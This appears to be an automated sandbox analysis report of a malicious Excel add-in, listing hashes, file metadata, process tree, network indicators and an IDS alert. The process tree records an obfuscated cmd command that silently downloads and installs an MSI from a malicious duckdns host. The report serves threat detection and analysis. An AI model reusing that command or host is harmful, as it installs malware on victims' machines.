File name: | sp.xlam |
Full analysis: | https://app.any.run/tasks/3f9159d3-dd14-4d5a-a411-beb16db69e76 |
Verdict: | Malicious activity |
Analysis date: | September 18, 2019, 15:31:56 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.spreadsheetml.sheet |
File info: | Microsoft Excel 2007+ |
MD5: | 5C3CE41ED7B1C0C8E168E993528FF7A1 |
SHA1: | C9DD25DD44CA65628FA1E8E3AD4851D666ADA094 |
SHA256: | E42C0FD3805A25CD66ECD040829262B93C807084A556C73E7C9548254637893A |
SSDEEP: | 192:Aexlcoq+8QkFaEMJJm9cG6ZAK0u+ofhQxizT3W7+p+1iTvUGPjpIzB:AKlr8F92JvGlY+ofhQITMaTsGPuN |
.xlsm | | | Excel Microsoft Office Open XML Format document (with Macro) (50.8) |
---|---|---|
.xlsx | | | Excel Microsoft Office Open XML Format document (30) |
.zip | | | Open Packaging Conventions container (15.4) |
.zip | | | ZIP compressed archive (3.5) |
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0006 |
ZipCompression: | Deflated |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCRC: | 0x8d5748fb |
ZipCompressedSize: | 368 |
ZipUncompressedSize: | 1087 |
ZipFileName: | [Content_Types].xml |
Creator: | admin |
---|
LastModifiedBy: | admin |
---|---|
CreateDate: | 2019:09:17 18:49:34Z |
ModifyDate: | 2019:09:17 18:49:34Z |
Application: | Microsoft Excel |
DocSecurity: | None |
ScaleCrop: | No |
HeadingPairs: |
|
TitlesOfParts: | Sheet1 |
Company: | - |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
AppVersion: | 15.03 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3384 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3920 | "C:\Windows\System32\cmd.exe" /c msie^x^EC /i http://s321.duckdns.org/v/c/g/t/the.msi /qn | C:\Windows\System32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1619 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2488 | msiexEC /i http://s321.duckdns.org/v/c/g/t/the.msi /qn | C:\Windows\system32\msiexec.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1619 Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
4020 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3384 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR97DF.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3384 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~$sp.xlam | — | |
MD5:— | SHA256:— | |||
3384 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF5409E013CF99F357.TMP | — | |
MD5:— | SHA256:— |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4020 | msiexec.exe | 23.249.163.172:80 | s321.duckdns.org | ColoCrossing | US | malicious |
Domain | IP | Reputation |
---|---|---|
s321.duckdns.org |
| malicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |